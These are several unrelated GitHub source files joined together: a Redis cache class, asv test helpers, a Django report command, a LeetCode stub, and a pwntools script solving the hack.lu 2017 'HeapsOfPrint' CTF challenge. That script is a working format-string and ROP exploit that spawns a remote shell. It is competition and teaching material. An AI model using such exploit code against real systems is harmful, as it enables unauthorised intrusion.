2: {'port': 6579},
3: {'port': 6679},
})
:param hosts: a dictionary of hosts that maps the host host_name to
configuration parameters. The parameters are used to
construct a :class:`~rc.redis_cluster.HostConfig`.
:param namespace: a prefix that should be added to all keys.
:param serializer_cls: the serialization class you want to use.
By default, it is :class:`~rc.JSONSerializer`.
:param default_expire: default expiration time that is used if no
expire specified on :meth:`set`.
:param router_cls: use this to override the redis router class,
default to be :class:`~rc.RedisCRC32HashRouter`.
:param router_options: a dictionary of parameters that is useful for
setting other parameters of router
:param pool_cls: use this to override the redis connection pool class,
default to be :class:`~redis.ConnectionPool`
:param pool_options: a dictionary of parameters that is useful for
setting other parameters of pool
:param max_concurrency: defines how many parallel queries can happen
at the same time
:param poller_timeout: for multi key operations we use a select loop as
the parallel query implementation, use this
to specify timeout for the underlying pollers
(select/poll/kqueue/epoll).
:param bypass_values: a list of return values that would be ignored by the
cache decorator and won't be cached at all.
.. versionadded:: 0.3
The `bypass_values` parameter was added.
"""
def __init__(self, hosts, namespace=None, serializer_cls=None,
default_expire=3 * 24 * 3600, router_cls=None,
router_options=None, pool_cls=None, pool_options=None,
max_concurrency=64, poller_timeout=1.0, bypass_values=[]):
BaseCache.__init__(self, namespace, serializer_cls, default_expire,
bypass_values)
self.hosts = hosts
self.router_cls = router_cls
self.router_options = router_options
self.pool_cls = pool_cls
self.pool_options = pool_options
self.max_concurrency = max_concurrency
self.poller_timeout = poller_timeout
def get_client(self):
redis_cluster = RedisCluster(self.hosts, router_cls=self.router_cls,
router_options=self.router_options,
pool_cls=self.pool_cls,
pool_options=self.pool_options)
return redis_cluster.get_client(self.max_concurrency,
self.poller_timeout)
def set_many(self, mapping, expire=None):
if not mapping:
return True
if expire is None:
expire = self.default_expire
string_mapping = {}
for key, value in mapping.iteritems():
string = self.serializer.dumps(value)
string_mapping[self.namespace + key] = string
return self.client.msetex(string_mapping, expire)
def delete_many(self, *keys):
if not keys:
return True
if self.namespace:
keys = [self.namespace + key for key in keys]
return self.client.mdelete(*keys)
class BatchManager(object):
"""Context manager that helps us with batching."""
def __init__(self, cache):
self.cache = cache
def __enter__(self):
self.cache._running_mode = BATCH_MODE
return self.cache
def __exit__(self, exc_type, exc_value, tb):
if exc_type is not None:
self.cache.batch(cancel=True)
else:
self.cache.batch()
| {
"content_hash": "9a11a33d74376916930f9c4e972461a9",
"timestamp": "",
"source": "github",
"line_count": 456,
"max_line_length": 79,
"avg_line_length": 38.675438596491226,
"alnum_prop": 0.5804604218643683,
"repo_name": "fengsp/rc",
"id": "f95715ca2208485ae08e116f5b8de875eccd0e5f",
"size": "17660",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rc/cache.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "341"
},
{
"name": "Python",
"bytes": "65115"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import, division, unicode_literals, print_function
"""
This file contains utilities to generate test repositories.
"""
import datetime
import io
import os
import threading
import time
import six
import tempfile
import textwrap
import sys
import shutil
import subprocess
from os.path import abspath, join, dirname, relpath, isdir
from contextlib import contextmanager
from hashlib import sha256
from six.moves import SimpleHTTPServer
import pytest
try:
import hglib
except ImportError as exc:
hglib = None
import asv
from asv import util
from asv import commands
from asv import config
from asv import environment
from asv import runner
from asv.commands.preview import create_httpd
from asv.repo import get_repo
from asv.results import Results
from asv.plugins.conda import _find_conda
# Two Python versions for testing
PYTHON_VER1 = "{0[0]}.{0[1]}".format(sys.version_info)
if sys.version_info < (3,):
PYTHON_VER2 = "3.6"
else:
PYTHON_VER2 = "2.7"
# Installable library versions to use in tests
DUMMY1_VERSION = "0.14"
DUMMY2_VERSIONS = ["0.3.7", "0.3.9"]
WIN = (os.name == "nt")
try:
util.which('pypy')
HAS_PYPY = True
except (RuntimeError, IOError):
HAS_PYPY = hasattr(sys, 'pypy_version_info') and (sys.version_info[:2] == (2, 7))
try:
# Conda can install required Python versions on demand
_find_conda()
HAS_CONDA = True
except (RuntimeError, IOError):
HAS_CONDA = False
try:
import virtualenv
HAS_VIRTUALENV = True
except ImportError:
HAS_VIRTUALENV = False
try:
util.which('python{}'.format(PYTHON_VER2))
HAS_PYTHON_VER2 = True
except (RuntimeError, IOError):
HAS_PYTHON_VER2 = False
try:
import selenium
from selenium.common.exceptions import TimeoutException
HAVE_WEBDRIVER = True
except ImportError:
HAVE_WEBDRIVER = False
WAIT_TIME = 20.0
from filelock import FileLock
def get_default_environment_type(conf, python):
return environment.get_environment_class(conf, python).tool_name
@contextmanager
def locked_cache_dir(config, cache_key, timeout=900, tag=None):
base_dir = config.cache.makedir(cache_key)
lockfile = join(six.text_type(base_dir), 'lock')
cache_dir = join(six.text_type(base_dir), 'cache')
lock = FileLock(lockfile)
lock.acquire(timeout=timeout)
try:
# Clear cache dir contents if it was generated with different
# asv version
tag_fn = join(six.text_type(base_dir), 'tag.json')
tag_content = [asv.__version__, repr(tag)]
if os.path.isdir(cache_dir):
try:
if util.load_json(tag_fn) != tag_content:
raise ValueError()
except (IOError, ValueError, util.UserError):
shutil.rmtree(cache_dir)
if not os.path.isdir(cache_dir):
os.makedirs(cache_dir)
yield cache_dir
util.write_json(tag_fn, tag_content)
finally:
lock.release()
def run_asv(*argv, **kwargs):
parser, subparsers = commands.make_argparser()
args = parser.parse_args(argv)
return args.func(args, **kwargs)
def run_asv_with_conf(conf, *argv, **kwargs):
assert isinstance(conf, config.Config)
parser, subparsers = commands.make_argparser()
args = parser.parse_args(argv)
if sys.version_info[0] >= 3:
cls = args.func.__self__
else:
cls = args.func.im_self
return cls.run_from_conf_args(conf, args, **kwargs)
# These classes are defined here, rather than using asv/plugins/git.py
# and asv/plugins/mercurial.py since here we need to perform write
# operations to the repository, and the others should be read-only for
# safety.
class Git(object):
def __init__(self, path):
self.path = abspath(path)
self._git = util.which('git')
self._fake_date = datetime.datetime.now()
def run_git(self, args, chdir=True, **kwargs):
if chdir:
cwd = self.path
else:
cwd = None
kwargs['cwd'] = cwd
return util.check_output(
[self._git] + args, **kwargs)
def init(self):
self.run_git(['init'])
self.run_git(['config', 'user.email', 'robot@asv'])
self.run_git(['config', 'user.name', 'Robotic Swallow'])
def commit(self, message, date=None):
if date is None:
self._fake_date += datetime.timedelta(seconds=1)
date = self._fake_date
self.run_git(['commit', '--date', date.isoformat(),
'-m', message])
def tag(self, number):
self.run_git(['tag', '-a', '-m', 'Tag {0}'.format(number),
'tag{0}'.format(number)])
def add(self, filename):
self.run_git(['add', relpath(filename, self.path)])
def checkout(self, branch_name, start_commit=None):
args = ["checkout"]
if start_commit is not None:
args.extend(["-b", branch_name, start_commit])
else:
args.append(branch_name)
self.run_git(args)
def merge(self, branch_name, commit_message=None):
self.run_git(["merge", "--no-ff", "--no-commit", "-X", "theirs", branch_name])
if commit_message is None:
commit_message = "Merge {0}".format(branch_name)
self.commit(commit_message)
def get_hash(self, name):
return self.run_git(['rev-parse', name]).strip()
def get_branch_hashes(self, branch=None):
if branch is None:
branch = "master"
return [x.strip() for x in self.run_git(['rev-list', branch]).splitlines()
if x.strip()]
def get_commit_message(self, commit_hash):
return self.run_git(["log", "-n", "1", "--format=%s", commit_hash]).strip()
_hg_config = """
[ui]
username = Robotic Swallow <robot@asv>
"""
class Hg(object):
encoding = 'utf-8'
def __init__(self, path):
self._fake_date = datetime.datetime.now()
self.path = abspath(path)
self._repo = None
def __del__(self):
if self._repo is not None:
self._repo.close()
self._repo = None
def init(self):
hglib.init(self.path)
with io.open(join(self.path, '.hg', 'hgrc'), 'w', encoding="utf-8") as fd:
fd.write(_hg_config)
self._repo = hglib.open(self.path.encode(sys.getfilesystemencoding()),
encoding=self.encoding)
def commit(self, message, date=None):
if date is None:
self._fake_date += datetime.timedelta(seconds=1)
date = self._fake_date
date = "{0} 0".format(util.datetime_to_timestamp(date))
self._repo.commit(message.encode(self.encoding),
date=date.encode(self.encoding))
def tag(self, number):
self._fake_date += datetime.timedelta(seconds=1)
date = "{0} 0".format(util.datetime_to_timestamp(self._fake_date))
self._repo.tag(
['tag{0}'.format(number).encode(self.encoding)],
message="Tag {0}".format(number).encode(self.encoding),
date=date.encode(self.encoding))
def add(self, filename):
self._repo.add([filename.encode(sys.getfilesystemencoding())])
def checkout(self, branch_name, start_commit=None):
if start_commit is not None:
self._repo.update(start_commit.encode(self.encoding))
self._repo.branch(branch_name.encode(self.encoding))
else:
self._repo.update(branch_name.encode(self.encoding))
def merge(self, branch_name, commit_message=None):
self._repo.merge(branch_name.encode(self.encoding),
tool=b"internal:other")
if commit_message is None:
commit_message = "Merge {0}".format(branch_name)
self.commit(commit_message)
def get_hash(self, name):
log = self._repo.log(name.encode(self.encoding), limit=1)
if log:
return log[0][1].decode(self.encoding)
return None
def get_branch_hashes(self, branch=None):
if branch is None:
branch = "default"
log = self._repo.log('sort(ancestors({0}), -rev)'.format(branch).encode(self.encoding))
return [entry[1].decode(self.encoding) for entry in log]
def get_commit_message(self, commit_hash):
return self._repo.log(commit_hash.encode(self.encoding))[0].desc.decode(self.encoding)
def copy_template(src, dst, dvcs, values):
for root, dirs, files in os.walk(src):
for dir in dirs:
src_path = join(root, dir)
dst_path = join(dst, relpath(src_path, src))
if not isdir(dst_path):
os.makedirs(dst_path)
for file in files:
src_path = join(root, file)
dst_path = join(dst, relpath(src_path, src))
try:
with io.open(src_path, 'r', encoding='utf-8') as fd:
content = fd.read()
except UnicodeDecodeError:
# File is some sort of binary file... just copy it
# directly with no template substitution
with io.open(src_path, 'rb') as fd:
content = fd.read()
with io.open(dst_path, 'wb') as fd:
fd.write(content)
else:
content = content.format(**values)
with io.open(dst_path, 'w', encoding='utf-8') as fd:
fd.write(content)
dvcs.add(dst_path)
def generate_test_repo(tmpdir, values=[0], dvcs_type='git',
extra_branches=(), subdir=''):
"""
Generate a test repository
Parameters
----------
tmpdir
Repository directory
values : list
List of values to substitute in the template
dvcs_type : {'git', 'hg'}
What dvcs to use
extra_branches : list of (start_commit, branch_name, values)
Additional branches to generate in the repository.
For branch start commits, use relative references, e.g.,
the format 'master~10' or 'default~10' works both for Hg
and Git.
subdir
A relative subdirectory inside the repository to copy the
test project into.
Returns
-------
dvcs : Git or Hg
"""
if dvcs_type == 'git':
dvcs_cls = Git
elif dvcs_type == 'hg':
dvcs_cls = Hg
else:
raise ValueError("Unknown dvcs type {0}".format(dvcs_type))
template_path = join(dirname(__file__), 'test_repo_template')
if not os.path.isdir(tmpdir):
os.makedirs(tmpdir)
dvcs_path = tempfile.mkdtemp(prefix='test_repo', dir=tmpdir)
dvcs = dvcs_cls(dvcs_path)
dvcs.init()
project_path = os.path.join(dvcs_path, subdir)
if not os.path.exists(project_path):
os.makedirs(project_path)
for i, value in enumerate(values):
mapping = {
'version': i,
'dummy_value': value
}
copy_template(template_path, project_path, dvcs, mapping)
dvcs.commit("Revision {0}".format(i))
dvcs.tag(i)
if extra_branches:
for start_commit, branch_name, values in extra_branches:
dvcs.checkout(branch_name, start_commit)
for i, value in enumerate(values):
mapping = {
'version': "{0}".format(i),
'dummy_value': value
}
copy_template(template_path, project_path, dvcs, mapping)
dvcs.commit("Revision {0}.{1}".format(branch_name, i))
return dvcs
def generate_repo_from_ops(tmpdir, dvcs_type, operations):
if dvcs_type == 'git':
dvcs_cls = Git
elif dvcs_type == 'hg':
dvcs_cls = Hg
else:
raise ValueError("Unknown dvcs type {0}".format(dvcs_type))
template_path = join(dirname(__file__), 'test_repo_template')
if not os.path.isdir(tmpdir):
os.makedirs(tmpdir)
dvcs_path = tempfile.mkdtemp(prefix='test_repo', dir=tmpdir)
dvcs = dvcs_cls(dvcs_path)
dvcs.init()
version = 0
for op in operations:
if op[0] == "commit":
copy_template(template_path, dvcs_path, dvcs, {
"version": version,
"dummy_value": op[1],
})
version += 1
dvcs.commit("Revision {0}".format(version), *op[2:])
elif op[0] == "checkout":
dvcs.checkout(*op[1:])
elif op[0] == "merge":
dvcs.merge(*op[1:])
else:
raise ValueError("Unknown dvcs operation {0}".format(op))
return dvcs
def generate_result_dir(tmpdir, dvcs, values, branches=None):
result_dir = join(tmpdir, "results")
os.makedirs(result_dir)
html_dir = join(tmpdir, "html")
machine_dir = join(result_dir, "tarzan")
os.makedirs(machine_dir)
if branches is None:
branches = [None]
conf = config.Config.from_json({
'results_dir': result_dir,
'html_dir': html_dir,
'repo': dvcs.path,
'project': 'asv',
'branches': branches or [None],
})
repo = get_repo(conf)
util.write_json(join(machine_dir, "machine.json"), {
'machine': 'tarzan',
'version': 1,
})
timestamp = datetime.datetime.utcnow()
benchmark_version = sha256(os.urandom(16)).hexdigest()
params = []
param_names = None
for commit, value in values.items():
if isinstance(value, dict):
params = value["params"]
value = value["result"]
else:
value = [value]
result = Results({"machine": "tarzan"}, {}, commit,
repo.get_date_from_name(commit), "2.7", None, {})
value = runner.BenchmarkResult(
result=value,
samples=[None]*len(value),
number=[None]*len(value),
errcode=0,
stderr='',
profile=None)
result.add_result({"name": "time_func", "version": benchmark_version, "params": params},
value, started_at=timestamp, duration=1.0)
result.save(result_dir)
if params:
param_names = ["param{}".format(k) for k in range(len(params))]
util.write_json(join(result_dir, "benchmarks.json"), {
"time_func": {
"name": "time_func",
"params": params or [],
"param_names": param_names or [],
"version": benchmark_version,
}
}, api_version=2)
return conf
@pytest.fixture(scope="session")
def example_results(request):
with locked_cache_dir(request.config, "example-results") as cache_dir:
src = abspath(join(dirname(__file__), 'example_results'))
dst = abspath(join(cache_dir, 'results'))
if os.path.isdir(dst):
return dst
shutil.copytree(src, dst)
src_machine = join(dirname(__file__), 'asv-machine.json')
dst_machine = join(cache_dir, 'asv-machine.json')
shutil.copyfile(src_machine, dst_machine)
# Convert to current file format
conf = config.Config.from_json({'results_dir': dst,
'repo': 'none',
'project': 'asv'})
run_asv_with_conf(conf, 'update', _machine_file=dst_machine)
return dst
@pytest.fixture(scope="session")
def browser(request, pytestconfig):
"""
Fixture for Selenium WebDriver browser interface
"""
driver_str = pytestconfig.getoption('webdriver')
if driver_str == "None":
pytest.skip("No webdriver selected for tests (use --webdriver).")
# Evaluate the options
def FirefoxHeadless():
options = selenium.webdriver.FirefoxOptions()
options.add_argument("-headless")
return selenium.webdriver.Firefox(options=options)
def ChromeHeadless():
options = selenium.webdriver.ChromeOptions()
options.add_argument('headless')
options.add_experimental_option('w3c', False)
return selenium.webdriver.Chrome(options=options)
ns = {}
six.exec_("import selenium.webdriver", ns)
six.exec_("from selenium.webdriver import *", ns)
ns['FirefoxHeadless'] = FirefoxHeadless
ns['ChromeHeadless'] = ChromeHeadless
create_driver = ns.get(driver_str, None)
if create_driver is None:
src = "def create_driver():\n"
src += textwrap.indent(driver_str, " ")
six.exec_(src, ns)
create_driver = ns['create_driver']
# Create the browser
browser = create_driver()
# Set timeouts
browser.set_page_load_timeout(WAIT_TIME)
browser.set_script_timeout(WAIT_TIME)
# Clean up on fixture finalization
def fin():
browser.quit()
request.addfinalizer(fin)
# Set default time to wait for AJAX requests to complete
browser.implicitly_wait(WAIT_TIME)
return browser
@contextmanager
def preview(base_path):
"""
Context manager for ASV preview web server. Gives the base URL to use.
Parameters
----------
base_path : str
Path to serve files from
"""
class Handler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def translate_path(self, path):
# Don't serve from cwd, but from a different directory
path = SimpleHTTPServer.SimpleHTTPRequestHandler.translate_path(self, path)
path = os.path.join(base_path, os.path.relpath(path, os.getcwd()))
return util.long_path(path)
httpd, base_url = create_httpd(Handler)
def run():
try:
httpd.serve_forever()
except:
import traceback
traceback.print_exc()
finally:
httpd.server_close()
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
try:
yield base_url
finally:
# Stop must be run in a separate thread, because
# httpd.shutdown blocks until serve_forever returns. We don't
# want to block here --- it appears in some environments
# problems shutting down the server may arise.
stopper = threading.Thread(target=httpd.shutdown)
stopper.daemon = True
stopper.start()
stopper.join(5.0)
def get_with_retry(browser, url):
for j in range(2):
try:
return browser.get(url)
except TimeoutException:
time.sleep(2)
return browser.get(url)
@pytest.fixture
def dummy_packages(request, monkeypatch):
"""
Build dummy wheels for required packages and set PIP_FIND_LINKS + CONDARC
"""
to_build = [('asv_dummy_test_package_1', DUMMY1_VERSION)]
to_build += [('asv_dummy_test_package_2', ver) for ver in DUMMY2_VERSIONS]
tag = [PYTHON_VER1, PYTHON_VER2, to_build, HAS_CONDA]
with locked_cache_dir(request.config, "asv-wheels", timeout=900, tag=tag) as cache_dir:
wheel_dir = os.path.abspath(join(six.text_type(cache_dir), 'wheels'))
monkeypatch.setenv(str('PIP_FIND_LINKS'), str('file://' + wheel_dir))
condarc = join(wheel_dir, 'condarc')
monkeypatch.setenv(str('CONDARC'), str(condarc))
if os.path.isdir(wheel_dir):
return
tmpdir = join(six.text_type(cache_dir), "tmp")
if os.path.isdir(tmpdir):
shutil.rmtree(tmpdir)
os.makedirs(tmpdir)
try:
os.makedirs(wheel_dir)
_build_dummy_wheels(tmpdir, wheel_dir, to_build, build_conda=HAS_CONDA)
except:
shutil.rmtree(wheel_dir)
raise
# Conda packages were installed in a local channel
if not WIN:
wheel_dir_str = "file://{0}".format(wheel_dir)
else:
wheel_dir_str = wheel_dir
with open(condarc, 'w') as f:
f.write("channels:\n"
"- defaults\n"
"- {0}".format(wheel_dir_str))
def _build_dummy_wheels(tmpdir, wheel_dir, to_build, build_conda=False):
# Build fake wheels for testing
for name, version in to_build:
build_dir = join(tmpdir, name + '-' + version)
os.makedirs(build_dir)
with open(join(build_dir, 'setup.py'), 'w') as f:
f.write("from setuptools import setup; "
"setup(name='{name}', version='{version}', packages=['{name}'])"
"".format(name=name, version=version))
os.makedirs(join(build_dir, name))
with open(join(build_dir, name, '__init__.py'), 'w') as f:
f.write("__version__ = '{0}'".format(version))
subprocess.check_call([sys.executable, '-mpip', 'wheel',
'--build-option=--universal',
'-w', wheel_dir,
'.'],
cwd=build_dir)
if build_conda:
_build_dummy_conda_pkg(name, version, build_dir, wheel_dir)
def _build_dummy_conda_pkg(name, version, build_dir, dst):
# Build fake conda packages for testing
from asv.plugins.conda import _conda_lock
build_dir = os.path.abspath(build_dir)
with open(join(build_dir, 'meta.yaml'), 'w') as f:
f.write(textwrap.dedent("""\
package:
name: "{name}"
version: "{version}"
source:
path: {build_dir}
build:
number: 0
script: "python -m pip install . --no-deps --ignore-installed "
requirements:
host:
- pip
- python
run:
- python
about:
license: BSD
summary: Dummy test package
""".format(name=name,
version=version,
build_dir=util.shlex_quote(build_dir))))
conda = _find_conda()
for pyver in [PYTHON_VER1, PYTHON_VER2]:
with _conda_lock():
subprocess.check_call([conda, 'build',
'--output-folder=' + dst,
'--no-anaconda-upload',
'--python=' + pyver,
'.'],
cwd=build_dir)
| {
"content_hash": "1ed3b2d94e845a37c2766b9e95f2c336",
"timestamp": "",
"source": "github",
"line_count": 739,
"max_line_length": 96,
"avg_line_length": 30.039242219215154,
"alnum_prop": 0.5778638677417902,
"repo_name": "qwhelan/asv",
"id": "d52c099ba0dd62b4411cd839b31b68650e998f3a",
"size": "22288",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/tools.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C++",
"bytes": "11960"
},
{
"name": "CSS",
"bytes": "4240"
},
{
"name": "HTML",
"bytes": "8621"
},
{
"name": "JavaScript",
"bytes": "112750"
},
{
"name": "Python",
"bytes": "743235"
}
],
"symlink_target": ""
} |
import reportengine
import sys
from django.core.management.base import BaseCommand, CommandError
from optparse import make_option
from reportengine.outputformats import CSVOutputFormat, XMLOutputFormat
from urlparse import parse_qsl
## ASSUMPTIONS: We're running this from the command line, so we can ignore
## - AdminOutputFormat
## - pagination
## TODO: Be more DRY about how the report is generated, including
## outputformat selection and filters and context creation
class Command(BaseCommand):
help = 'Run a report'
option_list = BaseCommand.option_list + (
make_option('-n', '--namespace',
dest='namespace',
default=None,
help='Report namespace'
),
make_option('-r', '--report',
dest='report',
default=None,
help='Name of report'
),
make_option('-f', '--file',
dest='file',
default=None,
help='Path to file (defaults to sys.stdout)'
),
make_option('-o', '--format',
dest='format',
default='csv',
help='Output format slug (csv, xml, etc)'
),
make_option('-q', '--filter',
dest='filter',
default='',
help='Filter args as a querystring (foo=bar&fizz=buzz)'
),
make_option('-b', '--order-by',
dest='order_by',
default=None,
help='Field to order the report by'
),
)
def handle(self, *args, **kwargs):
if not kwargs['namespace'] or not kwargs['report']:
raise CommandError('--namespace and --report are required')
## Try to open the file path if specified, default to sys.stdout if it wasn't
if kwargs['file']:
try:
output = file(kwargs['file'], 'w')
except Exception:
raise CommandError('Could not open file path for writing')
else:
output = sys.stdout
reportengine.autodiscover() ## Populate the reportengine registry
try:
report = reportengine.get_report(kwargs['namespace'], kwargs['report'])()
except Exception as err:
raise CommandError('Could not find report for (%(namespace)s, %(report)s)' % kwargs)
## Parse our filters
request = dict(parse_qsl(kwargs['filter']))
filter_form = report.get_filter_form(request)
if filter_form.fields:
if filter_form.is_valid():
filters = filter_form.cleaned_data
else:
filters = {}
else:
if report.allow_unspecified_filters:
filters = request
else:
filters = {}
# Remove blank filters
for k in filters.keys():
if filters[k] == '':
del filters[k]
## Update the mask and run the report!
mask = report.get_default_mask()
mask.update(filters)
rows, aggregates = report.get_rows(mask, order_by=kwargs['order_by'])
## Get our output format, setting a default if one wasn't set or isn't valid for this report
outputformat = None
if output:
for format in report.output_formats:
if format.slug == kwargs['format']:
outputformat = format
if not outputformat:
## By default, [0] is AdminOutputFormat, so grab the last one instead
outputformat = report.output_formats[-1]
context = {
'report': report,
'title': report.verbose_name,
'rows': rows,
'filter_form': filter_form,
'aggregates': aggregates,
'paginator': None,
'cl': None,
'page': 0,
'urlparams': kwargs['filter']
}
outputformat.generate_output(context, output)
output.close()
| {
"content_hash": "64c5cc5a00eda2c5bb33c2395541d50f",
"timestamp": "",
"source": "github",
"line_count": 118,
"max_line_length": 100,
"avg_line_length": 33.66101694915254,
"alnum_prop": 0.5453172205438066,
"repo_name": "jrutila/django-reportengine",
"id": "beba979d471e6721b9a4351efe58f1406fa7c48c",
"size": "3972",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "reportengine/management/commands/generate_report.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "9833"
},
{
"name": "Python",
"bytes": "93464"
}
],
"symlink_target": ""
} |
from pwn import *
context(arch='amd64', os='linux', terminal=['tmux', 'neww'])
env = {}
if args['GDB']:
io = gdb.debug(
'./HeapsOfPrint-amd64-2.23-0ubuntu9',
env=env,
gdbscript='''\
b *0x5555555548a8
ignore 1 10
b *0x555555554984
ignore 2 10
c
''')
elf, libc = io.elf, io.libc
elif args['REMOTE']:
io = remote('flatearth.fluxfingers.net', 1747)
elf, libc = ELF('./HeapsOfPrint'), ELF('libs/amd64/2.23/0ubuntu9/libc-2.23.so')
else:
io = process('./HeapsOfPrint-amd64-2.23-0ubuntu9', env=env)
elf, libc = io.elf, ELF('libs/amd64/2.23/0ubuntu9/libc-2.23.so')
# pwndbg> telescope 0x7fffffffed00
# 00:0000│ 0x7fffffffed00 —▸ 0x7fffffffed08 ◂— 0x0
# 01:0008│ 0x7fffffffed08 ◂— 0x0
# . . .
# 06:0030│ 0x7fffffffed30 —▸ 0x7fffffffed00 —▸ 0x7fffffffed08 ◂— 0x0
# the idea for solving the challenge came to me from looking at this section of the stack:
# we can access values 0x7fffffffed08 (at 0x7fffffffed00) and 0x7fffffffed00 (at 0x7fffffffed30)
# using direct parameter access in format strings to write arbitrary values at, for example,
# 0x7fffffffed08 and at the following addresses (0x7fffffffed08+0x8 and 0x7fffffffed08+0x10)
# TL;DR
# it happens that a single format string vulnerability can be used to:
# - modify a saved RBP in the stack to execute _start() when main() returns (thus executing main() again)
# - write in the stack a small part of a ROP chain
# this process can be repeated until the full chain is written and finally executed
# (instead of a full ROP chain, it should be enough to execute any of the single magic gadgets,
# although they did not work in my experiments—most probably because I messed up in the rush
# to solve the challenge)
# (because of ASLR, this script is not 100% reliable—you may need to run it a bunch of times)
###############################################################################
# leak the least significative byte of a variable in the stack
io.recvuntil('My favourite character is ')
stack_lsb_leak = u64(io.recvn(1).ljust(8, '\x00')) # 0x7fffffffed37
success('stack_lsb_leak: %s' % hex(stack_lsb_leak))
io.recvuntil('Is it?')
# pwndbg> telescope $rsp-0x20 40
# 00:0000│ 0x7fffffffed00 ◂— 0x400
# 01:0008│ 0x7fffffffed08 —▸ 0x555555554770 (_start) ◂— xor ebp, ebp
# . . .
# 04:0020│ rbp rsp 0x7fffffffed20 —▸ 0x7fffffffed40 —▸ 0x7fffffffed70 —▸ 0x555555554990 (__libc_csu_init) ◂— ...
# . . .
# 08:0040│ 0x7fffffffed40 —▸ 0x7fffffffed70 —▸ 0x555555554990 (__libc_csu_init) ◂— push r1
# use the format string to modify the last byte of saved RBP at 0x7fffffffed40 to point to 0x7fffffffed08-0x8
# in this way, _start() is going to be executed when main() returns
new_saved_rbp_lsb = (stack_lsb_leak - 0x7) + ((0x7fffffffed08 - 0x8) - 0x7fffffffed30)
if new_saved_rbp_lsb < 0: error('Bad ASLR luck! Try again')
# also, use the same format string to leak an address of the stack and one of libc
io.sendline('{}%6$hhn%6$p%17$p'.format('' if new_saved_rbp_lsb == 0x0 else '%{}x'.format(
new_saved_rbp_lsb)))
io.recvn(new_saved_rbp_lsb)
# receive the stack leak
a_stack_address = int(io.recvn(14), 16) # 0x7fffffffed40
success('a_stack_address: %s' % hex(a_stack_address))
# receive the libc leak and compute the base address
a_libc_address = int(io.recvn(14), 16) # 0x7ffff7a303f1 (__libc_start_main+241)
libc.address = a_libc_address - 0x0000000000020740 - 240
success('libc.address: %s' % hex(libc.address))
###############################################################################
# _start() got executed and we are back in main()
# again, use the format string to modify the last byte of saved RBP so to
# execute _start() again when main() returns
# in addition, use the format string to also write two bytes of the ROP chain at a time
# repeat the process multiple times to write the full ROP
rop = ROP(libc)
rop.system(next(libc.search('/bin/sh')))
raw_rop = str(rop)
pop_rdi_ret_address = u64(raw_rop[:8])
bin_sh_address = u64(raw_rop[8:16])
system_address = u64(raw_rop[16:24])
# compute the stack address where the ROP is going to be stored
rop_stack_address = a_stack_address + (0x7fffffffed08 - 0x7fffffffed40)
def exec_format_string_and_back_to__start(_start_address, what_to_write, next_where_to_write,
i_param1, i_param2):
new_saved_rbp_lsb = _start_address & 0xffff
a = new_saved_rbp_lsb
b = what_to_write - a if what_to_write > a else 0x10000 + what_to_write - a
c = next_where_to_write - what_to_write if next_where_to_write > what_to_write else 0x10000 + next_where_to_write - what_to_write
io.sendline('%{a}x%6$hn%{b}x%{i_param1}$hn%{c}x%{i_param2}$hhn'.format(
a=a, b=b, c=c, i_param1=i_param1, i_param2=i_param2))
# compute the address of _start() in the stack and indexes for direct parameter access in format strings
_start_address = a_stack_address + ((0x7fffffffec70 - 0x8) - 0x7fffffffed40)
i_param1 = 42
i_param2 = 48
curr_rop_stack_address = rop_stack_address
for gadget_address in (pop_rdi_ret_address, bin_sh_address, system_address):
for i in range(3):
part_of_gadget_address = (gadget_address >> (16 * i)) & 0xffff
next_rop_stack_address_lsb = (curr_rop_stack_address + 2**(i + 1)) & 0xff
# write part of the gadget address and move the pointer on where to write for the next iteration
exec_format_string_and_back_to__start(_start_address, part_of_gadget_address,
next_rop_stack_address_lsb, i_param1, i_param2)
# _start() got executed and we are back in main
# adjust offsets for the next execution
_start_address -= 0x90
i_param1 += 18
i_param2 += 18
curr_rop_stack_address += 0x8
###############################################################################
# modify for the last time the saved RBP to jump to the ROP when current main() returns
new_saved_rbp_lsb = (rop_stack_address - 0x8) & 0xffff
io.sendline('%{}x%6$hn'.format(new_saved_rbp_lsb))
io.interactive()
# $ ./HeapsOfPrint.py REMOTE
# [+] Opening connection to flatearth.fluxfingers.net on port 1747: Done
# [*] '/home/ubuntu/vbox/HeapsOfPrint'
# Arch: amd64-64-little
# RELRO: Full RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: PIE enabled
# [*] '/home/ubuntu/vbox/libc.so.6'
# Arch: amd64-64-little
# RELRO: Partial RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: PIE enabled
# [+] stack_lsb_leak: 0x57
# [+] a_stack_address: 0x7ffc0a077460
# [+] libc.address: 0x7f65f47cb000
# . . .
# 1$ ls
# flag
# HeapsOfPrint
# setup.sh
# $ cat flag
# FLAG{dr4w1ng_st4ckfr4m3s_f0r_fun_4nd_pr0f1t}
| {
"content_hash": "8927f7c1300957889737829f346f70b7",
"timestamp": "",
"source": "github",
"line_count": 169,
"max_line_length": 133,
"avg_line_length": 40.33136094674556,
"alnum_prop": 0.6467136150234741,
"repo_name": "integeruser/on-pwning",
"id": "53784e96244dd780edd9931564812e8d9949b68c",
"size": "6945",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "2017-hack.lu/HeapsOfPrint/HeapsOfPrint.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "26581"
},
{
"name": "C++",
"bytes": "18908"
},
{
"name": "Python",
"bytes": "200832"
}
],
"symlink_target": ""
} |
"""
Question:
Move Zeroes
Given an array nums, write a function to move all 0's to the end of it while maintaining the relative order of the non-zero elements.
For example, given nums = [0, 1, 0, 3, 12], after calling your function, nums should be [1, 3, 12, 0, 0].
Note:
You must do this in-place without making a copy of the array.
Minimize the total number of operations.
Credits:
Special thanks to @jianchao.li.fighter for adding this problem and creating all test cases.
Performance:
1. Total Accepted: 15730 Total Submissions: 38045 Difficulty: Easy
2. Sorry. We do not have enough accepted submissions.
"""
class Solution(object):
def moveZeroes(self, nums):
"""
:type nums: List[int]
:rtype: void Do not return anything, modify nums in-place instead.
"""
